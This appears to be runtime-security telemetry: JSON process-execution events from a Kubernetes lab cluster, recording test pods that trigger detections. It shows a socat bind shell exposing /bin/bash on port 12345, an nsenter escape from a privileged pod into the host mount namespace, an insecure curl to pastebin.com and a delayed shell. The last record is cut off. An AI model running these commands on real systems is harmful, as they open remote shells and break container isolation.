{"process_exec":{"process":{"exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6MTQ2NjI3MTg4ODIwODY3MzozNTIxNTMx","pid":3521531,"uid":100,"cwd":"/home/curl_user","binary":"/usr/bin/curl","arguments":"--insecure https://pastebin.com","flags":"execve inInitTree","start_time":"2025-08-14T21:38:59.355694505Z","auid":4294967295,"pod":{"namespace":"default","name":"daftpunk-curl-insecure","container":{"id":"containerd://5bee8961a002db773a90e7347c25ed95cd294042f426b060084812d11b34c63a","name":"daftpunk-curl-insecure","image":{"id":"docker.io/curlimages/curl@sha256:4026b29997dc7c823b51c164b71e2b51e0fd95cce4601f78202c513d97da2922","name":"docker.io/curlimages/curl:latest"},"start_time":"2025-08-14T21:38:59Z","pid":1,"security_context":{}},"pod_labels":{"run":"daftpunk-curl-insecure"},"workload":"daftpunk-curl-insecure","workload_kind":"Pod"},"docker":"5bee8961a002db773a90e7347c25ed9","parent_exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6MTQ2NjI3MTg4MTU2MDMxMTozNTIxNTMx","tid":3521531,"in_init_tree":true},"parent":{"exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6MTQ2NjI3MTg4MTU2MDMxMTozNTIxNTMx","pid":3521531,"uid":100,"cwd":"/home/curl_user","binary":"/entrypoint.sh","arguments":"/entrypoint.sh curl --insecure https://pastebin.com","flags":"execve clone inInitTree","start_time":"2025-08-14T21:38:59.349046512Z","auid":4294967295,"pod":{"namespace":"default","name":"daftpunk-curl-insecure","container":{"id":"containerd://5bee8961a002db773a90e7347c25ed95cd294042f426b060084812d11b34c63a","name":"daftpunk-curl-insecure","image":{"id":"docker.io/curlimages/curl@sha256:4026b29997dc7c823b51c164b71e2b51e0fd95cce4601f78202c513d97da2922","name":"docker.io/curlimages/curl:latest"},"start_time":"2025-08-14T21:38:59Z","pid":1,"security_context":{}},"pod_labels":{"run":"daftpunk-curl-insecure"},"workload":"daftpunk-curl-insecure","workload_kind":"Pod"},"docker":"5bee8961a002db773a90e7347c25ed9","parent_exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6MTQ2NjI3MTE1OTY0MjM2MzozNTIxNDcx","tid":3521531,"in_init_tree":true},"ancestors":[{"exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6MTQ2NjI3MTE1OTY0MjM2MzozNTIxNDcx","pid":3521471,"uid":0,"cwd":"/run/containerd/io.containerd.runtime.v2.task/k8s.io/6360fd3c87650ba14067fa49dc44e3a820768b36ed320b207cb9f9f6d43e5f10","binary":"/usr/bin/containerd-shim-runc-v2","arguments":"-namespace k8s.io -id 6360fd3c87650ba14067fa49dc44e3a820768b36ed320b207cb9f9f6d43e5f10 -address /run/containerd/containerd.sock","flags":"execve clone","start_time":"2025-08-14T21:38:58.627128111Z","auid":4294967295,"parent_exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6MTQ2NjI3MTE1MjY0Mzg4OTozNTIxNDYz","tid":3521471,"in_init_tree":false},{"exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6MTQ2NjI3MTE1MjY0Mzg4OTozNTIxNDYz","pid":3521463,"uid":0,"cwd":"/run/containerd/io.containerd.runtime.v2.task/k8s.io/6360fd3c87650ba14067fa49dc44e3a820768b36ed320b207cb9f9f6d43e5f10","binary":"/usr/bin/containerd-shim-runc-v2","arguments":"-namespace k8s.io -address /run/containerd/containerd.sock -publish-binary /usr/bin/containerd -id 6360fd3c87650ba14067fa49dc44e3a820768b36ed320b207cb9f9f6d43e5f10 start","flags":"execve clone","start_time":"2025-08-14T21:38:58.620129689Z","auid":4294967295,"parent_exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6MTcyMDAwMDAwMDA6Mjc0Mw==","tid":3521463,"in_init_tree":false},{"exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6MTcyMDAwMDAwMDA6Mjc0Mw==","pid":2743,"uid":0,"cwd":"/","binary":"/usr/bin/containerd","flags":"procFS auid rootcwd","start_time":"2025-07-28T22:21:24.667485178Z","auid":4294967295,"parent_exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6NjAwMDAwMDA6MQ==","tid":2743,"in_init_tree":false},{"exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6NjAwMDAwMDA6MQ==","pid":1,"uid":0,"cwd":"/","binary":"/usr/lib/systemd/systemd","arguments":"--switched-root --system --deserialize 21","flags":"procFS auid rootcwd","start_time":"2025-07-28T22:21:07.527485203Z","auid":4294967295,"parent_exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6MTow","tid":1,"in_init_tree":false}]},"node_name":"ip-10-0-10-253.us-west-2.compute.internal","time":"2025-08-14T21:38:59.355693920Z","cluster_name":"isovalent-2","node_labels":{"alpha.eksctl.io/cluster-name":"isovalent-2","alpha.eksctl.io/instance-id":"i-0839d680c54ccef60","alpha.eksctl.io/nodegroup-name":"ng-default","beta.kubernetes.io/arch":"amd64","beta.kubernetes.io/instance-type":"t3.medium","beta.kubernetes.io/os":"linux","failure-domain.beta.kubernetes.io/region":"us-west-2","failure-domain.beta.kubernetes.io/zone":"us-west-2c","k8s.io/cloud-provider-aws":"480fc25a68b07748a13498c4eb5a2a07","kubernetes.io/arch":"amd64","kubernetes.io/hostname":"ip-10-0-10-253.us-west-2.compute.internal","kubernetes.io/os":"linux","node-lifecycle":"on-demand","node.kubernetes.io/instance-type":"t3.medium","topology.k8s.aws/zone-id":"usw2-az3","topology.kubernetes.io/region":"us-west-2","topology.kubernetes.io/zone":"us-west-2c"}}
{"process_exec":{"process":{"exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6MTQ2NjE3MTA1ODQ3NjE3MzozNTIwNzY1","pid":3520765,"uid":0,"cwd":"/root","binary":"/bin/sh","arguments":"-c \"\nsocat TCP-LISTEN:12345,reuseaddr,fork EXEC:/bin/bash\"","flags":"execve clone inInitTree","start_time":"2025-08-14T21:37:18.525962691Z","auid":4294967295,"pod":{"namespace":"default","name":"socat-bash-test","container":{"id":"containerd://4c760a547a5a3b2c746329209e6575873f357bf78936e816770b75a987a7e9ed","name":"socat-bash-test","image":{"id":"docker.io/nicolaka/netshoot@sha256:7f08c4aff13ff61a35d30e30c5c1ea8396eac6ab4ce19fd02d5a4b3b5d0d09a2","name":"docker.io/nicolaka/netshoot:latest"},"start_time":"2025-08-14T21:37:18Z","pid":1,"security_context":{}},"pod_labels":{"run":"socat-bash-test"},"workload":"socat-bash-test","workload_kind":"Pod"},"docker":"4c760a547a5a3b2c746329209e65758","parent_exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6MTQ2NjE3MDI4NjIzMzcwODozNTIwNjgx","tid":3520765,"in_init_tree":true},"parent":{"exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6MTQ2NjE3MDI4NjIzMzcwODozNTIwNjgx","pid":3520681,"uid":0,"cwd":"/run/containerd/io.containerd.runtime.v2.task/k8s.io/7af8643fd5ed088c665cb08e2b6640c68d83a2c5e0a2bc414b25f72024d23aa1","binary":"/usr/bin/containerd-shim-runc-v2","arguments":"-namespace k8s.io -id 7af8643fd5ed088c665cb08e2b6640c68d83a2c5e0a2bc414b25f72024d23aa1 -address /run/containerd/containerd.sock","flags":"execve clone","start_time":"2025-08-14T21:37:17.753719206Z","auid":4294967295,"parent_exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6MTQ2NjE3MDI3OTY1MTk4MjozNTIwNjcz","tid":3520681,"in_init_tree":false},"ancestors":[{"exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6MTQ2NjE3MDI3OTY1MTk4MjozNTIwNjcz","pid":3520673,"uid":0,"cwd":"/run/containerd/io.containerd.runtime.v2.task/k8s.io/7af8643fd5ed088c665cb08e2b6640c68d83a2c5e0a2bc414b25f72024d23aa1","binary":"/usr/bin/containerd-shim-runc-v2","arguments":"-namespace k8s.io -address /run/containerd/containerd.sock -publish-binary /usr/bin/containerd -id 7af8643fd5ed088c665cb08e2b6640c68d83a2c5e0a2bc414b25f72024d23aa1 start","flags":"execve clone","start_time":"2025-08-14T21:37:17.747137341Z","auid":4294967295,"parent_exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6MTcyMDAwMDAwMDA6Mjc0Mw==","tid":3520673,"in_init_tree":false},{"exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6MTcyMDAwMDAwMDA6Mjc0Mw==","pid":2743,"uid":0,"cwd":"/","binary":"/usr/bin/containerd","flags":"procFS auid rootcwd","start_time":"2025-07-28T22:21:24.667485178Z","auid":4294967295,"parent_exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6NjAwMDAwMDA6MQ==","tid":2743,"in_init_tree":false},{"exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6NjAwMDAwMDA6MQ==","pid":1,"uid":0,"cwd":"/","binary":"/usr/lib/systemd/systemd","arguments":"--switched-root --system --deserialize 21","flags":"procFS auid rootcwd","start_time":"2025-07-28T22:21:07.527485203Z","auid":4294967295,"parent_exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6MTow","tid":1,"in_init_tree":false}]},"node_name":"ip-10-0-10-253.us-west-2.compute.internal","time":"2025-08-14T21:37:18.525962166Z","cluster_name":"isovalent-2","node_labels":{"alpha.eksctl.io/cluster-name":"isovalent-2","alpha.eksctl.io/instance-id":"i-0839d680c54ccef60","alpha.eksctl.io/nodegroup-name":"ng-default","beta.kubernetes.io/arch":"amd64","beta.kubernetes.io/instance-type":"t3.medium","beta.kubernetes.io/os":"linux","failure-domain.beta.kubernetes.io/region":"us-west-2","failure-domain.beta.kubernetes.io/zone":"us-west-2c","k8s.io/cloud-provider-aws":"480fc25a68b07748a13498c4eb5a2a07","kubernetes.io/arch":"amd64","kubernetes.io/hostname":"ip-10-0-10-253.us-west-2.compute.internal","kubernetes.io/os":"linux","node-lifecycle":"on-demand","node.kubernetes.io/instance-type":"t3.medium","topology.k8s.aws/zone-id":"usw2-az3","topology.kubernetes.io/region":"us-west-2","topology.kubernetes.io/zone":"us-west-2c"}}
{"process_exec":{"process":{"exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6MTkwMjA4OTE5NTA0OTQ2OToxNjE2NTg4","pid":1616588,"uid":0,"cwd":"/","binary":"/usr/bin/nsenter","arguments":"--mount=/host/proc/1/ns/mnt -- sh -lc \"echo daftpunk-host-nsenter-breakout > /root/escape_marker.txt && sync\"","flags":"execve rootcwd clone","start_time":"2025-08-19T22:42:36.662536442Z","auid":4294967295,"pod":{"namespace":"escape-lab","name":"nsenter-breakout","container":{"id":"containerd://000291f479b480b1d48e4fa31242b2976faed80b752798a68c6b769fbfb97cb8","name":"break","image":{"id":"docker.io/library/alpine@sha256:b3119ef930faabb6b7b976780c0c7a9c1aa24d0c75e9179ac10e6bc9ac080d0d","name":"docker.io/library/alpine:3.20"},"start_time":"2025-08-19T22:41:54Z","security_context":{"privileged":true}},"workload":"nsenter-breakout","workload_kind":"Pod"},"docker":"000291f479b480b1d48e4fa31242b29","parent_exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6MTkwMjA4ODE2NDM5NjA4ODoxNjE2NTc2","tid":1616588,"in_init_tree":false},"parent":{"exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6MTkwMjA4ODE2NDM5NjA4ODoxNjE2NTc2","pid":1616576,"uid":0,"cwd":"/","binary":"/bin/sh","arguments":"-lc \"\n  apk add --no-cache util-linux >/dev/null 2>&1 || true\n  nsenter --mount=/host/proc/1/ns/mnt -- \\\n    sh -lc \"echo daftpunk-host-$HOSTNAME > /root/escape_marker.txt && sync\"\n\"","flags":"execve rootcwd clone","start_time":"2025-08-19T22:42:35.631882596Z","auid":4294967295,"pod":{"namespace":"escape-lab","name":"nsenter-breakout","container":{"id":"containerd://000291f479b480b1d48e4fa31242b2976faed80b752798a68c6b769fbfb97cb8","name":"break","image":{"id":"docker.io/library/alpine@sha256:b3119ef930faabb6b7b976780c0c7a9c1aa24d0c75e9179ac10e6bc9ac080d0d","name":"docker.io/library/alpine:3.20"},"start_time":"2025-08-19T22:41:54Z","security_context":{"privileged":true}},"workload":"nsenter-breakout","workload_kind":"Pod"},"docker":"000291f479b480b1d48e4fa31242b29","parent_exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6MTkwMjA4ODE0MDU1MzY1MzoxNjE2NTY1","tid":1616576,"in_init_tree":false},"ancestors":[{"exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6MTkwMjA4ODE0MDU1MzY1MzoxNjE2NTY1","pid":1616565,"uid":0,"cwd":"/run/containerd/io.containerd.runtime.v2.task/k8s.io/aac853c931d09a337dbb9257307d4be1bd99d9d190207a6b51973d439022f39f","binary":"/usr/sbin/runc","arguments":"--root /run/containerd/runc/k8s.io --log /run/containerd/io.containerd.runtime.v2.task/k8s.io/000291f479b480b1d48e4fa31242b2976faed80b752798a68c6b769fbfb97cb8/log.json --log-format json --systemd-cgroup exec --process /tmp/runc-process2330800514 --console-socket /tmp/pty3838416221/pty.sock --detach --pid-file /run/containerd/io.containerd.runtime.v2.task/k8s.io/000291f479b480b1d48e4fa31242b2976faed80b752798a68c6b769fbfb97cb8/befa0a2a5f948e728ff771023374282b7b879b0a7107e8889282836398c240c6.pid 000291f479b480b1d48e4fa31242b2976faed80b752798a68c6b769fbfb97cb8","flags":"execve clone","start_time":"2025-08-19T22:42:35.608039561Z","auid":4294967295,"parent_exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6MTkwMjA0NjgzMDk4NjMwNToxNjE2MjU2","tid":1616565,"in_init_tree":false},{"exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6MTkwMjA0NjgzMDk4NjMwNToxNjE2MjU2","pid":1616256,"uid":0,"cwd":"/run/containerd/io.containerd.runtime.v2.task/k8s.io/aac853c931d09a337dbb9257307d4be1bd99d9d190207a6b51973d439022f39f","binary":"/usr/bin/containerd-shim-runc-v2","arguments":"-namespace k8s.io -id aac853c931d09a337dbb9257307d4be1bd99d9d190207a6b51973d439022f39f -address /run/containerd/containerd.sock","flags":"execve clone","start_time":"2025-08-19T22:41:54.298533417Z","auid":4294967295,"parent_exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6MTkwMjA0NjgyNDcwMDg0MToxNjE2MjQ3","tid":1616256,"in_init_tree":false},{"exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6MTkwMjA0NjgyNDcwMDg0MToxNjE2MjQ3","pid":1616247,"uid":0,"cwd":"/run/containerd/io.containerd.runtime.v2.task/k8s.io/aac853c931d09a337dbb9257307d4be1bd99d9d190207a6b51973d439022f39f","binary":"/usr/bin/containerd-shim-runc-v2","arguments":"-namespace k8s.io -address /run/containerd/containerd.sock -publish-binary /usr/bin/containerd -id aac853c931d09a337dbb9257307d4be1bd99d9d190207a6b51973d439022f39f start","flags":"execve clone","start_time":"2025-08-19T22:41:54.292186061Z","auid":4294967295,"parent_exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6MTcyMDAwMDAwMDA6Mjc0Mw==","tid":1616247,"in_init_tree":false},{"exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6MTcyMDAwMDAwMDA6Mjc0Mw==","pid":2743,"uid":0,"cwd":"/","binary":"/usr/bin/containerd","flags":"procFS auid rootcwd","start_time":"2025-07-28T22:21:24.667485178Z","auid":4294967295,"parent_exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6NjAwMDAwMDA6MQ==","tid":2743,"in_init_tree":false},{"exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6NjAwMDAwMDA6MQ==","pid":1,"uid":0,"cwd":"/","binary":"/usr/lib/systemd/systemd","arguments":"--switched-root --system --deserialize 21","flags":"procFS auid rootcwd","start_time":"2025-07-28T22:21:07.527485203Z","auid":4294967295,"parent_exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6MTow","tid":1,"in_init_tree":false}]},"node_name":"ip-10-0-10-253.us-west-2.compute.internal","time":"2025-08-19T22:42:36.662534843Z","cluster_name":"isovalent-2","node_labels":{"alpha.eksctl.io/cluster-name":"isovalent-2","alpha.eksctl.io/instance-id":"i-0839d680c54ccef60","alpha.eksctl.io/nodegroup-name":"ng-default","beta.kubernetes.io/arch":"amd64","beta.kubernetes.io/instance-type":"t3.medium","beta.kubernetes.io/os":"linux","failure-domain.beta.kubernetes.io/region":"us-west-2","failure-domain.beta.kubernetes.io/zone":"us-west-2c","k8s.io/cloud-provider-aws":"480fc25a68b07748a13498c4eb5a2a07","kubernetes.io/arch":"amd64","kubernetes.io/hostname":"ip-10-0-10-253.us-west-2.compute.internal","kubernetes.io/os":"linux","node-lifecycle":"on-demand","node.kubernetes.io/instance-type":"t3.medium","topology.k8s.aws/zone-id":"usw2-az3","topology.kubernetes.io/region":"us-west-2","topology.kubernetes.io/zone":"us-west-2c"}}
{"process_exec":{"process":{"exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6MjUwNDA5NzYzMTI5NDAyNTo2MDI3MjY=","pid":602726,"uid":0,"cwd":"/","binary":"/bin/sleep","arguments":"5","flags":"execve rootcwd inInitTree","start_time":"2025-08-26T21:56:05.098779459Z","auid":4294967295,"pod":{"namespace":"default","name":"delayed-shell","container":{"id":"containerd://c48fd368771bb4ee42b6c5349e87ff834be06d96452d3b2041a8a000b9d6395f","name":"delayed-shell","image":{"id":"docker.io/library/alpine@sha256:4bcff63911fcb4448bd4fdacec207030997caf25e9bea4045fa6c8c44de311d1","name":"docker.io/library/alpine:3"},"start_time":"2025-08-26T21:50:05Z","pid":1,"security_context":{}},"pod_labels":{"run":"delayed-shell"},"workload":"delayed-shell","workload_kind":"Pod"},"docker":"c48fd368771bb4ee42b6c5349e87ff8","parent_exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6MjUwMzczNzYyNTA1NDgxMjo2MDI3MjY=","tid":602726,"in_init_tree":true},"parent":{"exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6MjUwMzczNzYyNTA1NDgxMjo2MDI3MjY=","pid":602726,"uid":0,"cwd":"/","binary":"/bin/sh","arguments":"-lc \"echo \"started\"; sleep 360; /bin/sh -lc \"echo late shell $(date)\"; sleep 5\"","flags":"execve rootcwd clone inInitTree","start_time":"2025-08-26T21:50:05.092540977Z","auid":4294967295,"pod":{"namespace":"default","name":"delayed-shell","container":{"id":"containerd://c48fd368771bb4ee42b6c5349e87ff834be06d96452d3b2041a8a000b9d6395f","name":"delayed-shell","image":{"id":"docker.io/library/alpine@sha256:4bcff63911fcb4448bd4fdacec207030997caf25e9bea4045fa6c8c44de311d1","name":"docker.io/library/alpine:3"},"start_time":"2025-08-26T21:50:05Z","pid":1,"security_context":{}},"pod_labels":{"run":"delayed-shell"},"workload":"delayed-shell","workload_kind":"Pod"},"docker":"c48fd368771bb4ee42b6c5349e87ff8","parent_exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6MjUwMzczNzQ2NDMyODQ0OTo2MDI2Njk=","tid":602726,"in_init_tree":true},"ancestors":[{"exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6MjUwMzczNzQ2NDMyODQ0OTo2MDI2Njk=","pid":602669,"uid":0,"cwd":"/run/containerd/io.containerd.runtime.v2.task/k8s.io/3489e42874ecaf13fe2908d3ab2a5d0cae7ff7941b97c353285a3fd0b294354e","binary":"/usr/bin/containerd-shim-runc-v2","arguments":"-namespace k8s.io -id 3489e42874ecaf13fe2908d3ab2a5d0cae7ff7941b97c353285a3fd0b294354e -address /run/containerd/containerd.sock","flags":"execve clone","start_time":"2025-08-26T21:50:04.931814297Z","auid":4294967295,"parent_exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6MjUwMzczNzQ1NzUwNTUwNTo2MDI2NjA=","tid":602669,"in_init_tree":false},{"exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6MjUwMzczNzQ1NzUwNTUwNTo2MDI2NjA=","pid":602660,"uid":0,"cwd":"/run/containerd/io.containerd.runtime.v2.task/k8s.io/3489e42874ecaf13fe2908d3ab2a5d0cae7ff7941b97c353285a3fd0b294354e","binary":"/usr/bin/containerd-shim-runc-v2","arguments":"-namespace k8s.io -address /run/containerd/containerd.sock -publish-binary /usr/bin/containerd -id 3489e42874ecaf13fe2908d3ab2a5d0cae7ff7941b97c353285a3fd0b294354e start","flags":"execve clone","start_time":"2025-08-26T21:50:04.924990706Z","auid":4294967295,"parent_exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6MTcyMDAwMDAwMDA6Mjc0Mw==","tid":602660,"in_init_tree":false},{"exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6MTcyMDAwMDAwMDA6Mjc0Mw==","pid":2743,"uid":0,"cwd":"/","binary":"/usr/bin/containerd","flags":"procFS auid rootcwd","start_time":"2025-07-28T22:21:24.667485178Z","auid":4294967295,"parent_exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6NjAwMDAwMDA6MQ==","tid":2743,"in_init_tree":false},{"exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6NjAwMDAwMDA6MQ==","pid":1,"uid":0,"cwd":"/","binary":"/usr/lib/systemd/systemd","arguments":"--switched-root --system --deserialize 21","flags":"procFS auid rootcwd","start_time":"2025-07-28T22:21:07.527485203Z","auid":4294967295,"parent_exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6MTow","tid":1,"in_init_tree":false}]},"node_name":"ip-10-0-10-253.us-west-2.compute.internal","time":"2025-08-26T21:56:05.098779178Z","cluster_name":"isovalent-2","node_labels":{"alpha.eksctl.io/cluster-name":"isovalent-2","alpha.eksctl.io/instance-id":"i-0839d680c54ccef60","alpha.eksctl.io/nodegroup-name":"ng-default","beta.kubernetes.io/arch":"amd64","beta.kubernetes.io/instance-type":"t3.medium","beta.kubernetes.io/os":"linux","failure-domain.beta.kubernetes.io/region":"us-west-2","failure-domain.beta.kubernetes.io/zone":"us-west-2c","k8s.io/cloud-provider-aws":"480fc25a68b07748a13498c4eb5a2a07","kubernetes.io/arch":"amd64","kubernetes.io/hostname":"ip-10-0-10-253.us-west-2.compute.internal","kubernetes.io/os":"linux","node-lifecycle":"on-demand","node.kubernetes.io/instance-type":"t3.medium","topology.k8s.aws/zone-id":"usw2-az3","topology.kubernetes.io/region":"us-west-2","topology.kubernetes.io/zone":"us-west-2c"}}
{"process_exec":{"process":{"exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6MjUwNDA5NzYzMDc5NTYzMjo2MDQ2MzY=","pid":604636,"uid":0,"cwd":"/","binary":"/bin/sh","arguments":"-lc \"echo late shell Tue Aug 26 21:56:05 UTC 2025\"","flags":"execve rootcwd clone inInitTree","start_time":"2025-08-26T21:56:05.098281366Z","auid":4294967295,"pod":{"namespace":"default","name":"delayed-shell","container":{"id":"containerd://c48fd368771bb4ee42b6c5349e87ff834be06d96452d3b2041a8a000b9d6395f","name":"delayed-shell","image":{"id":"docker.io/library/alpine@sha256:4bcff63911fcb4448bd4fdacec207030997caf25e9bea4045fa6c8c44de311d1","name":"docker.io/library/alpine:3"},"start_time":"2025-08-26T21:50:05Z","pid":9,"security_context":{}},"pod_labels":{"run":"delayed-shell"},"workload":"delayed-shell","workload_kind":"Pod"},"docker":"c48fd368771bb4ee42b6c5349e87ff8","parent_exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6MjUwMzczNzYyNTA1NDgxMjo2MDI3MjY=","tid":604636,"in_init_tree":true},"parent":{"exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6MjUwMzczNzYyNTA1NDgxMjo2MDI3MjY=","pid":602726,"uid":0,"cwd":"/","binary":"/bin/sh","arguments":"-lc \"echo \"started\"; sleep 360; /bin/sh -lc \"echo late shell $(date)\"; sleep 5\"","flags":"execve rootcwd clone inInitTree","start_time":"2025-08-26T21:50:05.092540977Z","auid":4294967295,"pod":{"namespace":"default","name":"delayed-shell","container":{"id":"containerd://c48fd368771bb4ee42b6c5349e87ff834be06d96452d3b2041a8a000b9d6395f","name":"delayed-shell","image":{"id":"docker.io/library/alpine@sha256:4bcff63911fcb4448bd4fdacec207030997caf25e9bea4045fa6c8c44de311d1","name":"docker.io/library/alpine:3"},"start_time":"2025-08-26T21:50:05Z","pid":1,"security_context":{}},"pod_labels":{"run":"delayed-shell"},"workload":"delayed-shell","workload_kind":"Pod"},"docker":"c48fd368771bb4ee42b6c5349e87ff8","parent_exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6MjUwMzczNzQ2NDMyODQ0OTo2MDI2Njk=","tid":602726,"in_init_tree":true},"ancestors":[{"exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6MjUwMzczNzQ2NDMyODQ0OTo2MDI2Njk=","pid":602669,"uid":0,"cwd":"/run/containerd/io.containerd.runtime.v2.task/k8s.io/3489e42874ecaf13fe2908d3ab2a5d0cae7ff7941b97c353285a3fd0b294354e","binary":"/usr/bin/containerd-shim-runc-v2","arguments":"-namespace k8s.io -id 3489e42874ecaf13fe2908d3ab2a5d0cae7ff7941b97c353285a3fd0b294354e -address /run/containerd/containerd.sock","flags":"execve clone","start_time":"2025-08-26T21:50:04.931814297Z","auid":4294967295,"parent_exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6MjUwMzczNzQ1NzUwNTUwNTo2MDI2NjA=","tid":602669,"in_init_tree":false},{"exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6MjUwMzczNzQ1NzUwNTUwNTo2MDI2NjA=","pid":602660,"uid":0,"cwd":"/run/containerd/io.containerd.runtime.v2.task/k8s.io/3489e42874ecaf13fe2908d3ab2a5d0cae7ff7941b97c353285a3fd0b294354e","binary":"/usr/bin/containerd-shim-runc-v2","arguments":"-namespace k8s.io -address /run/containerd/containerd.sock -publish-binary /usr/bin/containerd -id 3489e42874ecaf13fe2908d3ab2a5d0cae7ff7941b97c353285a3fd0b294354e start","flags":"execve clone","start_time":"2025-08-26T21:50:04.924990706Z","auid":4294967295,"parent_exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6MTcyMDAwMDAwMDA6Mjc0Mw==","tid":602660,"in_init_tree":false},{"exec_id":"aXAtMTAtMC0xMC0yNTMudXMtd2VzdC0yLmNvbXB1dGUuaW50ZXJuYWw6MTcyMDAwMDAwMDA6Mjc0Mw==","pid":2743,"uid":0,"cwd":"/","binary":"/usr/bin/containerd","flags":"procFS auid 